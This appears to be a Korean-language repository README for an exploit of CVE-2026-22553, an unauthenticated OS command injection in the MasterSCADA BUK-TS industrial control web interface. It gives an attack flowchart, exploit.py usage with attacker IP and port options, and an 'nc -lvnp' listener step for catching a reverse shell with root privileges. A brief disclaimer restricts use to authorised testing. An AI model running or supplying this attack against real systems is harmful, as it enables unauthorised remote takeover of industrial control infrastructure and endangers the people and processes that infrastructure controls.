
InSAT MasterSCADA BUK-TS MMadmServ 웹 인터페이스에 대한 인증되지 않은 OS 명령 삽입 익스플로잇. HTTP POST 요청을 통해 루트 권한으로 리버스 셸을 전달합니다. CVSS 9.8 심각.
CVE-2026-22553 | CVSS 9.8 심각| 익스플로잇 작성자: Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS는 MMadmServ 웹 인터페이스에서 인증되지 않은 OS 명령 삽입 취약점이 존재합니다. 이 결함으로 인해 원격 공격자는 인증 없이 **완전한 원격 코드 실행(RCE)**을 달성할 수 있습니다.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fffpython3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| 옵션 | 설명 |
|---|---|
target | 대상 URL (예: http://ip:port) |
--lhost | 사용자 IP 주소 (리버스 셸) |
--lport | 사용자 리스닝 포트 |
사용자 머신에서 리스너를 시작하세요:
nc -lvnp 4444
익스플로잇을 실행하세요:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
root/시스템 권한으로 리버스 셸을 획득하세요.
이 익스플로잇은 교육 및 승인된 모의 침투 테스트 목적으로만 제공됩니다.
소유하지 않은 시스템에 무단 사용하는 것은 불법이며, 국제법을 위반할 수 있습니다.
작성자는 불법 사용에 대한 책임을 지지 않습니다.
Mohammed Idrees Banyamer
이 저장소가 유용하다면 ⭐ 스타를 눌러주세요!